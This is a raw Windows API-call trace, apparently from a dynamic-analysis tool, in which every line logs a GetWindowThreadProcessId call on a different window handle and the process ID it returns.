	[0684.339] GetWindowThreadProcessId (in: hWnd=0x20212, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0xa88
	[0684.339] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0xa6c
	[0684.339] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0xa68
	[0684.339] GetWindowThreadProcessId (in: hWnd=0x20206, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x9f8
	[0684.339] GetWindowThreadProcessId (in: hWnd=0x20204, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0xa04
	[0684.339] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x924
	[0684.339] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x8dc
	[0684.340] GetWindowThreadProcessId (in: hWnd=0x201ec, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x7dc
	[0684.340] GetWindowThreadProcessId (in: hWnd=0x301d6, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x768
	[0684.340] GetWindowThreadProcessId (in: hWnd=0x301e0, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x764
	[0684.340] GetWindowThreadProcessId (in: hWnd=0x201e4, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x820
	[0684.340] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x810
	[0684.340] GetWindowThreadProcessId (in: hWnd=0x301f2, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x794
	[0684.340] GetWindowThreadProcessId (in: hWnd=0x401b6, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x83c
	[0684.340] GetWindowThreadProcessId (in: hWnd=0x501be, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x7ac
	[0684.340] GetWindowThreadProcessId (in: hWnd=0x160162, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0xb44
	[0684.341] GetWindowThreadProcessId (in: hWnd=0x108d6, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x6bc
	[0684.341] GetWindowThreadProcessId (in: hWnd=0x500ea, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0xb5c
	[0684.341] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x838
	[0684.341] GetWindowThreadProcessId (in: hWnd=0x800a8, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x4d0
	[0684.341] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x4d0
	[0684.341] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x4d0
	[0684.341] GetWindowThreadProcessId (in: hWnd=0x300d2, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x4d0
	[0684.341] GetWindowThreadProcessId (in: hWnd=0x300ce, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x4d0
	[0684.342] GetWindowThreadProcessId (in: hWnd=0x300d8, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x4d0
	[0684.342] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x4d0
	[0684.342] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x4d0
	[0684.342] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x818
	[0684.342] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x5b8
	[0684.342] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x494
	[0684.342] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x1ec
	[0684.342] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x440
	[0684.343] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x7e8
	[0684.343] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x730
	[0684.343] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x2c8
	[0684.343] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x31c
	[0684.343] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x330
	[0684.343] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x128
	[0684.343] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x5c8
	[0684.343] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x6f8
	[0684.344] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x358
	[0686.601] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x73c
	[0690.152] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0xb0
	[0692.082] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x250
	[0692.086] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x240
	[0693.832] GetWindowThreadProcessId (in: hWnd=0x2015e, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x790
	[0693.832] GetWindowThreadProcessId (in: hWnd=0x40112, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x61c
	[0693.832] GetWindowThreadProcessId (in: hWnd=0x3015a, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x540
	[0693.832] GetWindowThreadProcessId (in: hWnd=0x10150, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x538
	[0693.832] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x568
	[0693.833] GetWindowThreadProcessId (in: hWnd=0x20144, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x538
	[0693.833] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x568
	[0693.833] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x538
	[0693.833] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x540
	[0693.833] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x540
	[0693.833] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x57c
	[0693.833] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x460
	[0693.833] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x554
	[0693.834] GetWindowThreadProcessId (in: hWnd=0x50094, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x4d0
	[0693.834] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x528
	[0693.834] GetWindowThreadProcessId (in: hWnd=0x10088, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x4d0
	[0693.834] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x4d0
	[0693.834] GetWindowThreadProcessId (in: hWnd=0x1006e, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x4d0
	[0693.834] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x79c
	[0693.834] GetWindowThreadProcessId (in: hWnd=0x1006a, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x4d0
	[0693.834] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x4e0
	[0693.835] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x4d0
	[0693.835] GetWindowThreadProcessId (in: hWnd=0x1004a, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x460
	[0693.835] GetWindowThreadProcessId (in: hWnd=0x20046, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x460
	[0693.835] GetWindowThreadProcessId (in: hWnd=0x30044, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x44c
	[0693.835] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x778
	[0693.835] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x460
	[0693.835] GetWindowThreadProcessId (in: hWnd=0x30140, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x558
	[0693.835] GetWindowThreadProcessId (in: hWnd=0x1005c, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x4d0
	[0693.836] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x4d0
	[0693.836] GetWindowThreadProcessId (in: hWnd=0x108c6, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x1748
	[0693.836] GetWindowThreadProcessId (in: hWnd=0x2037c, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x1bb4
	[0693.836] GetWindowThreadProcessId (in: hWnd=0x204d4, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x10bc
	[0693.836] GetWindowThreadProcessId (in: hWnd=0x20376, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x1b50
	[0693.836] GetWindowThreadProcessId (in: hWnd=0x108ba, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x14b4
	[0693.836] GetWindowThreadProcessId (in: hWnd=0x108b4, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x149c
	[0693.836] GetWindowThreadProcessId (in: hWnd=0x108ae, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x14a8
	[0693.837] GetWindowThreadProcessId (in: hWnd=0x108a2, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x1490
	[0693.837] GetWindowThreadProcessId (in: hWnd=0x10890, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x14a4
	[0693.837] GetWindowThreadProcessId (in: hWnd=0x1087e, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x148c
	[0693.837] GetWindowThreadProcessId (in: hWnd=0x1084a, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x1458
	[0693.837] GetWindowThreadProcessId (in: hWnd=0x10840, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x1b4c
	[0693.837] GetWindowThreadProcessId (in: hWnd=0x20616, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x1b3c
	[0693.837] GetWindowThreadProcessId (in: hWnd=0x10838, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x19bc
	[0693.837] GetWindowThreadProcessId (in: hWnd=0x10828, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x199c
	[0693.838] GetWindowThreadProcessId (in: hWnd=0x10824, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x1998
	[0693.838] GetWindowThreadProcessId (in: hWnd=0x10820, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x1994
	[0693.838] GetWindowThreadProcessId (in: hWnd=0x1081c, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x1990
	[0693.838] GetWindowThreadProcessId (in: hWnd=0x10812, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x1984
	[0693.838] GetWindowThreadProcessId (in: hWnd=0x1080c, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x197c
	[0693.838] GetWindowThreadProcessId (in: hWnd=0x10808, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x1978
	[0693.838] GetWindowThreadProcessId (in: hWnd=0x107e4, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x1824
	[0693.838] GetWindowThreadProcessId (in: hWnd=0x107d0, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x1088
	[0693.839] GetWindowThreadProcessId (in: hWnd=0x107c4, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x1908
	[0693.839] GetWindowThreadProcessId (in: hWnd=0x107b6, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x18cc
	[0693.839] GetWindowThreadProcessId (in: hWnd=0x1079c, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x18d0
	[0693.839] GetWindowThreadProcessId (in: hWnd=0x10792, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x1840
	[0693.839] GetWindowThreadProcessId (in: hWnd=0x10780, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x10c4
	[0693.839] GetWindowThreadProcessId (in: hWnd=0x1077a, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x128c
	[0693.839] GetWindowThreadProcessId (in: hWnd=0x10776, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x16e8
	[0693.839] GetWindowThreadProcessId (in: hWnd=0x204a2, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x16cc
	[0693.840] GetWindowThreadProcessId (in: hWnd=0x10768, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x274
	[0693.840] GetWindowThreadProcessId (in: hWnd=0x10764, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x10e0
	[0693.840] GetWindowThreadProcessId (in: hWnd=0x10760, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x10cc
	[0693.840] GetWindowThreadProcessId (in: hWnd=0x1075c, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x10c0
	[0693.840] GetWindowThreadProcessId (in: hWnd=0x30750, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x10d0
	[0693.840] GetWindowThreadProcessId (in: hWnd=0x1072e, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x1198
	[0693.840] GetWindowThreadProcessId (in: hWnd=0x10720, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x1080
	[0693.840] GetWindowThreadProcessId (in: hWnd=0x10712, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x1074
	[0693.841] GetWindowThreadProcessId (in: hWnd=0x10704, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x106c
	[0693.841] GetWindowThreadProcessId (in: hWnd=0x106cc, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x1474
	[0693.841] GetWindowThreadProcessId (in: hWnd=0x106c8, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x1414
	[0693.841] GetWindowThreadProcessId (in: hWnd=0x106c6, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0xbd0
	[0693.841] GetWindowThreadProcessId (in: hWnd=0x106c2, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x550
	[0693.841] GetWindowThreadProcessId (in: hWnd=0x20370, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0xa38
	[0693.841] GetWindowThreadProcessId (in: hWnd=0x202e8, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x16d0
	[0693.841] GetWindowThreadProcessId (in: hWnd=0x20338, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x16d4
	[0693.842] GetWindowThreadProcessId (in: hWnd=0x106b6, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x15bc
	[0693.842] GetWindowThreadProcessId (in: hWnd=0x10690, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x15a0
	[0693.842] GetWindowThreadProcessId (in: hWnd=0x10680, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x159c
	[0693.842] GetWindowThreadProcessId (in: hWnd=0x10670, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x1598
	[0693.842] GetWindowThreadProcessId (in: hWnd=0x10660, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x1594
	[0693.842] GetWindowThreadProcessId (in: hWnd=0x10650, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x1590
	[0693.842] GetWindowThreadProcessId (in: hWnd=0x10640, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x158c
	[0693.842] GetWindowThreadProcessId (in: hWnd=0x10630, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x1588
	[0693.843] GetWindowThreadProcessId (in: hWnd=0x1062c, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x1584
	[0693.843] GetWindowThreadProcessId (in: hWnd=0x10628, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x1580
	[0693.843] GetWindowThreadProcessId (in: hWnd=0x10624, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x157c
	[0693.843] GetWindowThreadProcessId (in: hWnd=0x1061e, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x1488
	[0693.843] GetWindowThreadProcessId (in: hWnd=0x10612, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x1404
	[0693.843] GetWindowThreadProcessId (in: hWnd=0x1060e, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x11b8
	[0693.843] GetWindowThreadProcessId (in: hWnd=0x105fc, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0xbd4
	[0693.843] GetWindowThreadProcessId (in: hWnd=0x105ec, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0xe0c
	[0693.844] GetWindowThreadProcessId (in: hWnd=0x105dc, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0xd30
	[0693.844] GetWindowThreadProcessId (in: hWnd=0x105c8, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0xe70
	[0693.844] GetWindowThreadProcessId (in: hWnd=0x105b8, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x13b8
	[0693.844] GetWindowThreadProcessId (in: hWnd=0x105a8, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0xe20
	[0693.844] GetWindowThreadProcessId (in: hWnd=0x1058a, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0xe2c
	[0693.844] GetWindowThreadProcessId (in: hWnd=0x1057a, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0xe00
	[0693.844] GetWindowThreadProcessId (in: hWnd=0x10576, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0xe04
	[0693.844] GetWindowThreadProcessId (in: hWnd=0x10570, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0xc94
	[0693.845] GetWindowThreadProcessId (in: hWnd=0x10568, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x13b0
	[0693.845] GetWindowThreadProcessId (in: hWnd=0x10564, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x13ac
	[0693.845] GetWindowThreadProcessId (in: hWnd=0x10560, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x13a8
	[0693.845] GetWindowThreadProcessId (in: hWnd=0x1055a, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x1374
	[0693.845] GetWindowThreadProcessId (in: hWnd=0x10552, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x132c
	[0693.845] GetWindowThreadProcessId (in: hWnd=0x10544, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x1328
	[0693.845] GetWindowThreadProcessId (in: hWnd=0x1051c, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x12d0
	[0693.845] GetWindowThreadProcessId (in: hWnd=0x1050c, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x12cc
	[0693.846] GetWindowThreadProcessId (in: hWnd=0x104fc, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x12c8
	[0693.847] GetWindowThreadProcessId (in: hWnd=0x104da, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x1290
	[0693.847] GetWindowThreadProcessId (in: hWnd=0x104d0, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x1218
	[0693.847] GetWindowThreadProcessId (in: hWnd=0x104cc, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x1214
	[0693.847] GetWindowThreadProcessId (in: hWnd=0x104ca, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x11ec
	[0693.847] GetWindowThreadProcessId (in: hWnd=0x104c6, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x11e8
	[0693.847] GetWindowThreadProcessId (in: hWnd=0x202b4, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x11cc
	[0693.848] GetWindowThreadProcessId (in: hWnd=0x202b6, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x1140
	[0693.848] GetWindowThreadProcessId (in: hWnd=0x104be, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0xe6c
	[0693.848] GetWindowThreadProcessId (in: hWnd=0x104ae, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x6e8
	[0693.848] GetWindowThreadProcessId (in: hWnd=0x10490, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0xc6c
	[0693.848] GetWindowThreadProcessId (in: hWnd=0x10480, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0xf94
	[0693.848] GetWindowThreadProcessId (in: hWnd=0x10470, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0xffc
	[0693.848] GetWindowThreadProcessId (in: hWnd=0x10460, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0xf74
	[0693.848] GetWindowThreadProcessId (in: hWnd=0x1044e, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0xf08
	[0693.849] GetWindowThreadProcessId (in: hWnd=0x10442, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0xf0c
	[0693.849] GetWindowThreadProcessId (in: hWnd=0x1043a, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0xed8
	[0693.849] GetWindowThreadProcessId (in: hWnd=0x10436, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0xe90
	[0693.849] GetWindowThreadProcessId (in: hWnd=0x10432, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0xea8
	[0693.849] GetWindowThreadProcessId (in: hWnd=0x10416, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0xfa8
	[0693.849] GetWindowThreadProcessId (in: hWnd=0x10412, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0xfbc
	[0693.849] GetWindowThreadProcessId (in: hWnd=0x1040e, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0xfb8
	[0693.849] GetWindowThreadProcessId (in: hWnd=0x1040a, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0xfb4
	[0693.849] GetWindowThreadProcessId (in: hWnd=0x10406, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0xfb0
	[0693.850] GetWindowThreadProcessId (in: hWnd=0x10402, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0xfac
	[0693.850] GetWindowThreadProcessId (in: hWnd=0x103fe, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0xfc0
	[0693.850] GetWindowThreadProcessId (in: hWnd=0x103f0, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0xfd0
	[0693.850] GetWindowThreadProcessId (in: hWnd=0x1039a, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0xf88
	[0693.850] GetWindowThreadProcessId (in: hWnd=0x1038a, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0xf84
	[0693.850] GetWindowThreadProcessId (in: hWnd=0x10382, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0xf80
	[0693.850] GetWindowThreadProcessId (in: hWnd=0x1036e, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0xde0
	[0693.850] GetWindowThreadProcessId (in: hWnd=0x1036a, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0xddc
	[0693.851] GetWindowThreadProcessId (in: hWnd=0x10366, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0xdd8
	[0693.851] GetWindowThreadProcessId (in: hWnd=0x10360, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0xd34
	[0693.851] GetWindowThreadProcessId (in: hWnd=0x10358, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0xd10
	[0693.851] GetWindowThreadProcessId (in: hWnd=0x20276, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0xd0c
	[0693.851] GetWindowThreadProcessId (in: hWnd=0x800a4, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0xc9c
	[0693.851] GetWindowThreadProcessId (in: hWnd=0x10346, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0xc74
